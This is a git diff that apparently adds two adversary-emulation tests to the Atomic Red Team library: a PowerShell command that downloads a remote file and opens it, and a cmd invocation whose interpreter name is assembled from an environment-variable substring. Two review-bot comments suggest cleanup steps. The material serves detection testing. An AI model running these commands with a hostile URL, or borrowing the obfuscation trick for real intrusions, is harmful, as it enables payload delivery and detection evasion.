diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f2257e0e..5705cb4a 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -860,6 +860,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index b338da52..d4703978 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -528,6 +528,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
 command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 21b70104..f96bd50a 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1559,6 +1559,7 @@ - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - Atomic Test #14: whois file download [linux, macos] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d85cc21e..dd913c70 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -960,6 +960,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #3: portproxy reg key [windows] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 4f451fdb..6e49e660 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -65221,6 +65221,27 @@ command-and-control: cleanup_command: 'rm -f #{output_file} ' + - name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: 'Use PowerShell to download and write an arbitrary file from the + internet. Example is from the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') + | Out-File #{output_file}; Invoke-Item #{output_file}\n" + name: powershell T1090.001: technique: external_references:
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index cbe28a3f..3c1952e2 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -52,3 +52,23 @@ atomic_tests: cleanup_command: | del "#{file_contents_path}" name: command_prompt + +- name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: | + Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: | + %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} + name: command_prompt
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index caef3d08..57e0c326 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -32,6 +32,8 @@ - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell) +
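Review bot: The new "Suspicious Execution via Windows Command Shell" test has no `cleanup_command`, so `#{output_file}` (default `hello.txt`, a relative path resolved against wherever the runner was started) is left on disk after every run, whereas the preceding test in this file removes its artifact with `del`. Add `cleanup_command: |` followed by `  del /f /q "#{output_file}" >nul 2>&1` before `name: command_prompt`. The command also only works while `%LOCALAPPDATA%` keeps its stock `...\AppData\Local` form, because the interpreter name is assembled from a substring of that variable; on a host where the variable has been redirected the test dies with an "is not recognized" error instead of a clear message, so state that precondition in the description (or add a `dependencies` entry whose `prereq_command` checks it). It would also help analysts if the description said what the test is meant to surface — presumably the indirect spelling in the invoking command line, since cmd expands the variable before the child starts — but I am inferring that from cmd's expansion order, so confirm it against the report.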
@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package" +
+
+ +## Atomic Test #15 - File Download via PowerShell +Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt| +| output_file | File to write to | string | LICENSE.txt| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} +``` + + + + + +
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index c90158a6..7838f6a5 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -381,3 +381,23 @@ atomic_tests: timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} + +- name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: | + Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: | + (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} + name: powershell
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index bdecd84c..6b256736 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -732,3 +732,4 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
 b8e747c3-bdf7-4d71-bce2-f1df2a057406
 a12b5531-acab-4618-a470-0dafb294a87a
 d400090a-d8ca-4be0-982e-c70598a23de9
+54a4daf1-71df-4383-9ba7-f1a295d8b6d2
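Review bot: The new "File Download via PowerShell" test writes `#{output_file}` (default `LICENSE.txt`, relative to the runner's working directory) and then opens it with `Invoke-Item`, but has no `cleanup_command`, unlike the whois test directly above it that removes its output with `rm -f`; the downloaded file stays on disk and, with the `.txt` default, the viewer that `Invoke-Item` launched stays open. Add `cleanup_command: |` followed by `  Remove-Item -Path #{output_file} -Force -ErrorAction Ignore` before `name: powershell`. Because `Invoke-Item` hands the file to whatever handler is registered for its extension and needs an interactive desktop, the description should say that the test opens the file after writing it and is therefore not suited to unattended runs. Worth noting in the description as well that `Out-File` re-encodes the text (UTF-16LE by default in Windows PowerShell 5.1, as far as I know), so the on-disk copy will not hash-match the remote `LICENSE.txt` — relevant if a detection rule keys on the file hash rather than on the download behaviour. The generated copy of this test in `atomics/Indexes/index.yaml` in this same commit carries the same omission.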